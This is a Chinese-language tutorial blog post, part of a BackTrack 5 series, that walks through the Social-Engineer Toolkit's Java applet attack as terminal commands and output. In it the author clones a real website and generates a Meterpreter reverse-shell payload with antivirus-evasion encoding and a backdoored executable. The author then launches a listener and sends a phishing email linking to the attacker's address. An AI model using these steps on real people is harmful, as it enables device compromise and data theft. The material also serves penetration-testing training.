首页 > 编程语言 >BT5 2011.4.社会工程学.1.JAVA

BT5 2011.4.社会工程学.1.JAVA

时间:2024-08-20 23:16:50浏览次数:14  
标签:BT5 2011.4 set JAVA Normal Windows --- Attack SET

4.社会工程学工具   内容简介 第一部分:Java Applet Attack Method 第二部分:Credential Harvester Attack Method   第一部分 Java Applet Attack Method   拓扑介绍   SET介绍 The SET is an advanced,multi-function,and easy to use computer assisted social engineering toolsset.It helps you to prepare the most effective way of exploiting the client-side application vulnerabilities and make a fascinating attempt to capture the target's confidential information (for example,e-mail passwords).Some of the most effcient and usefull attack methods employed by SET include,targeted phishing e-mails with a malicious file attachment,Java applet attacks,browser-based exploitation,gathering website credentials,creating infectious portable media (USB/DVD/CD),mass-mailer attacks,and other similar multi-attack web vectors.This combination of attack methods provides a powerfull platform to utilize and select the most persuasive technique that could perform an advanced attack against the human element.(SET是一个高级的,多功能的,并且易于使用的计算机社会工程学工具集。)   root@bt:~# ifconfig eth1 eth1      Link encap:以太网  硬件地址 00:0c:29:f8:2a:28             inet 地址:162.168.1.102  广播:162.168.1.255  掩码:255.255.255.0           inet6 地址: fe80::20c:29ff:fef8:2a28/64 Scope:Link           UP BROADCAST RUNNING MULTICAST  MTU:1500  跃点数:1           接收数据包:20464 错误:0 丢弃:0 过载:0 帧数:0           发送数据包:38685 错误:0 丢弃:0 过载:0 载波:0           碰撞:0 发送队列长度:1000            接收字节:2995416 (2.9 MB)  发送字节:2585033 (2.5 MB)     root@bt:~# netstat -r 内核 IP 路由表 Destination     Gateway         Genmask         Flags   MSS Window  irtt Iface 162.168.1.0     *               255.255.255.0   U         0 0          0 eth1 default         162.168.1.2     0.0.0.0         UG        0 0          0 eth1   C:\Users\Smoke>ipconfig /all   Windows IP 配置      主机名  . . . . . . . . . . . . . : Smoke-PC    主 DNS 后缀 . . . . . . . . . . . :    节点类型  . . . . . . . . . . . . : 混合    IP 路由已启用 . . . . . . . . . . : 否    WINS 代理已启用 . . . . . . . . . : 否   无线局域网适配器 无线网络连接:      连接特定的 DNS 后缀 . . . . . . . :    描述. . . . . . . . . . . . . . . : 1x1 11b/g/n Wireless LAN PCI Express Half Mini Card Adapter    物理地址. . . . . . . . . . . . . : 7C-E9-D3-F8-4B-87    DHCP 已启用 . . . . . . . . . . . : 是    自动配置已启用. . . . . . . . . . : 是    本地链接 IPv6 地址. . . . . . . . : fe80::c104:d994:990d:a57e%17(首选)    IPv4 地址 . . . . . . . . . . . . : 162.168.1.101(首选)    子网掩码  . . . . . . . . . . . . : 255.255.255.0    获得租约的时间  . . . . . . . . . : 2015年4月15日 16:48:24    租约过期的时间  . . . . . . . . . : 2015年4月15日 23:48:23    默认网关. . . . . . . . . . . . . : 162.168.1.2    DHCP 服务器 . . . . . . . . . . . : 162.168.1.2    DHCPv6 IAID . . . . . . . . . . . : 578611667    DHCPv6 客户端 DUID  . . . . . . . : 00-01-00-01-1A-CC-98-0C-3C-97-0E-18-96-17    DNS 服务器  . . . . . . . . . . . : 221.11.1.67                                        221.11.1.68    TCPIP 上的 NetBIOS  . . . . . . . : 已启用   C:\Users\Smoke>ping www.baidu.com   正在 Ping www.a.shifen.com [61.135.169.121] 具有 32 字节的数据: 来自 61.135.169.121 的回复: 字节=32 时间=35ms TTL=54 来自 61.135.169.121 的回复: 字节=32 时间=41ms TTL=54 来自 61.135.169.121 的回复: 字节=32 时间=36ms TTL=54 来自 61.135.169.121 的回复: 字节=32 时间=35ms TTL=54   61.135.169.121 的 Ping 统计信息:     数据包: 已发送 = 4,已接收 = 4,丢失 = 0 (0% 丢失), 往返行程的估计时间(以毫秒为单位):     最短 = 35ms,最长 = 41ms,平均 = 36ms   修改配置文件(1)   root@bt:~# cd /pentest/exploits/set/ root@bt:/pentest/exploits/set# cd config/ root@bt:/pentest/exploits/set/config# ls mailing_list.txt  set_config  set_config.save  set_config.save.1  slim_set.py root@bt:/pentest/exploits/set/config# vim set_config METASPLOIT_PATH=/pentest/exploits/framework3 ETTERCAP=ON EMAIL_PROVIDER=GMAIL SELF_SIGNED_APPLET=ON JAVA_ID_PARAM=Secure Java Applet root@bt:/pentest/exploits/set/config# cd .. root@bt:/pentest/exploits/set# ./set                              .--.  .--. .-----.                         : .--': .--'`-. .-'                         `. `. : `;    : :                            _`, :: :__   : :                           `.__.'`.__.'  :_;        [---]        The Social-Engineer Toolkit (SET)         [---]   [---]        Created by: David Kennedy (ReL1K)         [---]   [---]        Development Team: JR DePre (pr1me)        [---]   [---]        Development Team: Joey Furr (j0fer)       [---]   [---]        Development Team: Thomas Werth            [---]   [---]                Version: 2.4.1                    [---]   [---]              Codename: 'Renegade'                [---]   [---]       Report bugs: [email protected]     [---]   [---]         Follow me on Twitter: dave_rel1k         [---]   [---]        Homepage: http://www.secmaniac.com        [---]      Welcome to the Social-Engineer Toolkit (SET). Your one     stop shop for all of your social-engineering needs..          Join us on irc.freenode.net in channel #setoolkit    Select from the menu:      1) Social-Engineering Attacks    2) Fast-Track Penetration Testing    3) Third Party Modules    4) Update the Metasploit Framework    5) Update the Social-Engineer Toolkit    6) Help, Credits, and About     99) Exit the Social-Engineer Toolkit   set> 1                      .M"""bgd `7MM"""YMM MMP""MM""YMM                  ,MI    "Y   MM    `7 P'   MM   `7                  `MMb.       MM   d        MM                         `YMMNq.   MMmmMM        MM                       .     `MM   MM   Y  ,     MM                       Mb     dM   MM     ,M     MM                       P"Ybmmd"  .JMMmmmmMMM   .JMML.     [---]        The Social-Engineer Toolkit (SET)         [---]   [---]        Created by: David Kennedy (ReL1K)         [---]   [---]        Development Team: JR DePre (pr1me)        [---]   [---]        Development Team: Joey Furr (j0fer)       [---]   [---]        Development Team: Thomas Werth            [---]   [---]                Version: 2.4.1                    [---]   [---]              Codename: 'Renegade'                [---]   [---]       Report bugs: [email protected]     [---]   [---]         Follow me on Twitter: dave_rel1k         [---]   [---]        Homepage: http://www.secmaniac.com        [---]      Welcome to the Social-Engineer Toolkit (SET). Your one     stop shop for all of your social-engineering needs..          Join us on irc.freenode.net in channel #setoolkit    Select from the menu:      1) Spear-Phishing Attack Vectors    2) Website Attack Vectors    3) Infectious Media Generator    4) Create a Payload and Listener    5) Mass Mailer Attack    6) Arduino-Based Attack Vector    7) SMS Spoofing Attack Vector    8) Wireless Access Point Attack Vector    9) Third Party Modules     99) Return back to the main menu.   set> 2    The Web Attack module is  a unique way of utilizing multiple web-based attacks  in order to compromise the intended victim.    The Java Applet Attack method will spoof a Java Certificate and deliver a   metasploit based payload. Uses a customized java applet created by Thomas  Werth to deliver the payload.    The Metasploit Browser Exploit method will utilize select Metasploit  browser exploits through an iframe and deliver a Metasploit payload.    The Credential Harvester method will utilize web cloning of a web-  site that has a username and password field and harvest all the   information posted to the website.    The TabNabbing method will wait for a user to move to a different  tab, then refresh the page to something different.    The Man Left in the Middle Attack method was introduced by Kos and   utilizes HTTP REFERER's in order to intercept fields and harvest   data from them. You need to have an already vulnerable site and in-  corporate <script src="http://YOURIP/">. This could either be from a  compromised site or through XSS.    The Web-Jacking Attack method was introduced by white_sheep, Emgent   and the Back|Track team. This method utilizes iframe replacements to   make the highlighted URL link to appear legitimate however when clicked   a window pops up then is replaced with the malicious link. You can edit  the link replacement settings in the set_config if its too slow/fast.    The Multi-Attack method will add a combination of attacks through the web attack  menu. For example you can utilize the Java Applet, Metasploit Browser,  Credential Harvester/Tabnabbing, and the Man Left in the Middle attack  all at once to see which is successful.      1) Java Applet Attack Method    2) Metasploit Browser Exploit Method    3) Credential Harvester Attack Method    4) Tabnabbing Attack Method    5) Man Left in the Middle Attack Method    6) Web Jacking Attack Method    7) Multi-Attack Web Method    8) Victim Web Profiler    9) Create or import a CodeSigning Certificate     99) Return to Main Menu   set:webattack>1    The first method will allow SET to import a list of pre-defined web   applications that it can utilize within the attack.    The second method will completely clone a website of your choosing  and allow you to utilize the attack vectors within the completely  same web application you were attempting to clone.    The third method allows you to import your own website, note that you  should only have an index.html when using the import website  functionality.        1) Web Templates    2) Site Cloner    3) Custom Import     99) Return to Webattack Menu   set:webattack>2    Simply enter in the required fields, easy example below:    Name: FakeCompany  Organization: Fake Company  Organization Name: Fake Company  City: Cleveland  State: Ohio  Country: US  Is this correct: yes   [!] *** WARNING *** [!] IN ORDER FOR THIS TO WORK YOU MUST INSTALL sun-java6-jdk or openjdk-6-jdk, so apt-get install openjdk-6-jdk [!] *** WARNING *** 您的名字与姓氏是什么?   [Unknown]:  cisco 您的组织单位名称是什么?   [Unknown]:  cisco 您的组织名称是什么?   [Unknown]:  cisco 您所在的城市或区域名称是什么?   [Unknown]:  bj 您所在的州或省份名称是什么?   [Unknown]:  bj 该单位的两字母国家代码是什么   [Unknown]:  cn CN=cisco, OU=cisco, O=cisco, L=bj, ST=bj, C=cn 正确吗?   [否]:  y     警告:  签名者证书将在六个月内过期。 [*] Java Applet is now signed and will be imported into the website [-] SET supports both HTTP and HTTPS [-] Example: http://www.thisisafakesite.com   set:webattack> Enter the url to clone:http://www.baidu.com   [*] Cloning the website: http://www.baidu.com [*] This could take a little bit... [*] Injecting Java Applet attack into the newly cloned website. [*] Filename obfuscation complete. Payload name is: IierAbDuaKTT [*] Malicious java applet website prepped for deployment     What payload do you want to generate:     Name:                                       Description:      1) Windows Shell Reverse_TCP               Spawn a command shell on victim and send back to attacker    2) Windows Reverse_TCP Meterpreter         Spawn a meterpreter shell on victim and send back to attacker    3) Windows Reverse_TCP VNC DLL             Spawn a VNC server on victim and send back to attacker    4) Windows Bind Shell                      Execute payload and create an accepting port on remote system    5) Windows Bind Shell X64                  Windows x64 Command Shell, Bind TCP Inline    6) Windows Shell Reverse_TCP X64           Windows X64 Command Shell, Reverse TCP Inline    7) Windows Meterpreter Reverse_TCP X64     Connect back to the attacker (Windows x64), Meterpreter    8) Windows Meterpreter Egress Buster       Spawn a meterpreter shell and find a port home via multiple ports    9) Windows Meterpreter Reverse HTTPS       Tunnel communication over HTTP using SSL and use Meterpreter   10) Windows Meterpreter Reverse DNS         Use a hostname instead of an IP address and spawn Meterpreter   11) SE Toolkit Interactive Shell            New custom interactive reverse shell designed for SET   12) RATTE HTTP Tunneling Payload            Security bypass payload that will tunnel all comms over HTTP   13) ShellCodeExec Alphanum Shellcode        This will drop a meterpreter payload through shellcodeexec (A/V Safe)   14) Import your own executable              Specify a path for your own executable   set:payloads>2   Below is a list of encodings to try and bypass AV.    Select one of the below, 'backdoored executable' is typically the best.      1) avoid_utf8_tolower (Normal)    2) shikata_ga_nai (Very Good)    3) alpha_mixed (Normal)    4) alpha_upper (Normal)    5) call4_dword_xor (Normal)    6) countdown (Normal)    7) fnstenv_mov (Normal)    8) jmp_call_additive (Normal)    9) nonalpha (Normal)   10) nonupper (Normal)   11) unicode_mixed (Normal)   12) unicode_upper (Normal)   13) alpha2 (Normal)   14) No Encoding (None)   15) Multi-Encoder (Excellent)   16) Backdoored Executable (BEST)   set:encoding>16 set:payloads> PORT of the listener [443]: [*] Generating x64-based powershell injection code... /bin/sh: /pentest/exploits/framework3msfvenom: 没有那个文件或目录 [*] Generating x86-based powershell injection code... /bin/sh: /pentest/exploits/framework3msfvenom: 没有那个文件或目录 [*] Finished generating shellcode powershell injection attack and is encoded to bypass excution restriction policys... [-] Backdooring a legit executable to bypass Anti-Virus. Wait a few seconds... [*] Backdoor completed successfully. Payload is now hidden within a legit executable. [*] UPX Encoding is set to ON, attempting to pack the executable with UPX encoding. [-] Packing the executable and obfuscating PE file randomly, one moment. [*] Digital Signature Stealing is ON, hijacking a legit digital certificate [*] Generating OSX payloads through Metasploit... [*] Generating Linux payloads through Metasploit...   *************************************************** Web Server Launched. Welcome to the SET Web Attack. ***************************************************   [--] Tested on IE6, IE7, IE8, IE9, Safari, Opera, Chrome, and FireFox [--] [-] Launching MSF Listener... [-] This may take a few to load MSF...      Social Engineer Toolkit Mass E-Mailer      There are two options on the mass e-mailer, the first would    be to send an email to one individual person. The second option    will allow you to import a list and send it to as many people as    you want within that list.      What do you want to do:       1.  E-Mail Attack Single Email Address     2.  E-Mail Attack Mass Mailer          99. Return to main menu.   set:mailer>1 set:phishing> Send email to:[email protected]   set:phishing>1 set:phishing> Your gmail email address: :[email protected]  Email password:  set:phishing> Flag this message/s as high priority? [yes|no]:yes set:phishing> Email subject:pls check this sites set:phishing> Send the message as html or plain? 'h' or 'p' [p]: set:phishing> Enter the body of the message, hit return for a new line. Control+c when finished:pls check this sites Next line of the body: http://162.168.1.102 Next line of the body: ^C              

标签:BT5,2011.4,set,JAVA,Normal,Windows,---,Attack,SET
From: https://www.cnblogs.com/smoke520/p/18370545

相关文章

  • BT5 2011.1.信息收集
    BT502111.信息收集2.扫描工具3.漏洞发现4.设备工程学工具5.运用层攻击MSF6.局域网攻击7.密码破解8.维持访问 内容简介第一部分:DNS信息收集第二部分:路由信息收集第三部分:All-in-one智能收集 第一部分DNS信息收集 1.Dnsmap介绍1.Getextranamesandsubdoma......
  • BT5 2011.3.漏洞发现.3(nessus)
    第四部分SMB工具 1.SamrdumpTheSamrdumpisanapplicationthatretrievessensitiveinformationaboutthespecifiedtargetusingSecurityAccountManager(SAM),aremoteinterfacewhichisaccessibleundertheDistributedComputingEnvironment/RemoteProced......
  • BT5 2011.3.漏洞发现.2(http smb)
    第三部分HTTP工具 1.BurpSuite(1)BurpSuiteisacombinationofpowerfulwebapplicationsecuritytools.Thesetoolsdemonstratethereal-worldcapabilitiesofanattackerpenetratingthewebapplications.Itcanscan,analyze,andexploitthewebapplications......
  • BT5 2011.3.漏洞发现.1(cisco snmp)
    3.漏洞发现 内容简介第一部分:Cisco工具第二部分:SNMP工具第三部分:HTTP工具第四部分:SMB工具第五部分:综合漏洞发现工具Nessus 第一部分Cisco工具 拓扑介绍 1.CiscoAuditingToolCiscoAuditingTool(CAT)isaminisecurityauditingtool.ItscanstheCiscor......
  • Java微信授权登录小程序接口
    1.微信授权登录小程序的流程是什么微信授权登录小程序的流程是一个涉及前端和后端交互的过程,主要目的是让用户能够使用微信账号快速登录小程序,避免重复输入用户名和密码。以下是该流程的详细步骤:1.1前端操作(1)触发登录:用户在小程序中点击“登录”按钮或进入需要登录的页面时,系......
  • Java的开发工具有哪些?这十款工具大厂都在用!
    Nessus工具介绍与使用教程工具介绍Nessus是一款广泛使用的网络漏洞扫描工具,由TenableNetworkSecurity开发。它能够帮助网络管理员和安全专业人员识别网络中的安全漏洞、配置错误和潜在的安全威胁。Nessus提供全面的漏洞检测功能,包括操作系统漏洞、应用程序漏洞、......
  • Java 安全编程:揭秘加密与解密的艺术
    引言在这个数字化时代,信息安全已成为各行各业关注的焦点。无论是个人隐私保护还是企业数据安全,加密技术都是维护网络安全的重要手段之一。Java作为一门广泛应用于服务器端开发的语言,其内置的安全机制和强大的第三方库支持,使得Java成为构建安全系统的理想选择。本文将带你深......
  • 在JavaScript中,`==` 和 `===` 操作符有什么区别?在什么情况下应该使用它们
    在JavaScript中,==(宽松相等)和===(严格相等)操作符是进行值比较时非常基础且关键的工具。它们之间的区别主要在于处理类型转换的方式上,这种差异对于编写清晰、可预测和高效的代码至关重要。下面将详细探讨这两个操作符的区别、使用场景,以及为什么在某些情况下推荐使用===而非==。=......
  • Java基础9
    super关键字为什么需要super:举例1:子类继承父类以后,对父类的方法进行重写,那么在子类中,使用super关键字仍然可以对父类中重写的方法进行调用举例2:子类继承父类以后,发现子类和父类中定义了同名的属性,使用super关键字仍然可以在子类中区分这两个同名的属性super的理解:父类的s......
  • Java面向对象
    1.面向对象类和对象的理解类:类是对现实生活中一类具有共同属性和行为的事物的抽象,是对现实事物的一种描述。(例如一个描述人的类,他只描述人的总体特征,有姓名、身高等信息,而没有具体的值)类的组成:成员变量,方法,构造器,代码块,内部类。对象:对象是真实存在的实体,是类的实例。......